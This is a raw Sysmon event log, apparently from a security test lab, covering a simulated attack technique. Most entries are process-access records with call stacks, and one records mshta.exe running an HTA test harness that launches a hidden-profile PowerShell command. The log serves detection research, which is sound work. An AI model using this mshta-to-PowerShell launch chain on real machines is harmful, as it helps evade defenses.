15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028205Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028204Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028203Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028408Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.287{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5382-6008-8406-00000000A301}6456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028407Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.287{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5382-6008-8406-00000000A301}6456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028406Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.240{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5382-6008-8406-00000000A301}6456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028405Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.240{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5382-6008-8406-00000000A301}6456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000028404Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.193{7901BC46-5382-6008-8406-00000000A301}6456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_sf0th1c5.5bz.ps12021-01-20 16:00:02.193 10341000x800000000000000028403Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.178{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5382-6008-8406-00000000A301}6456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028402Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.146{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5382-6008-8506-00000000A301}6424C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028401Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.146{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5382-6008-8506-00000000A301}6424C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028400Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.146{7901BC46-5382-6008-8506-00000000A301}64247368C:\Windows\system32\conhost.exe{7901BC46-5382-6008-8406-00000000A301}6456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028399Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.131{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5382-6008-8506-00000000A301}6424C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028398Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.131{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028397Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.131{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028396Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.131{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028395Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.131{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028394Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.131{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5382-6008-8406-00000000A301}6456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028393Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.131{7901BC46-5382-6008-8306-00000000A301}43126344C:\Windows\System32\mshta.exe{7901BC46-5382-6008-8406-00000000A301}6456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028392Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.134{7901BC46-5382-6008-8406-00000000A301}6456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 687550c1-f80d-4009-a018-38aba1298c46; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5382-6008-8306-00000000A301}4312C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" 10341000x800000000000000028391Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.099{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5382-6008-8306-00000000A301}4312C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028390Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.099{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5382-6008-8306-00000000A301}4312C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028389Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.099{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5382-6008-8306-00000000A301}4312C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028388Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.084{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5382-6008-8306-00000000A301}4312C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028387Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.084{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5382-6008-8306-00000000A301}4312C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028386Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.068{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5382-6008-8306-00000000A301}4312C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028385Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.068{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5382-6008-8306-00000000A301}4312C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028384Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.053{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5382-6008-8306-00000000A301}4312C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028383Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.053{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028382Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 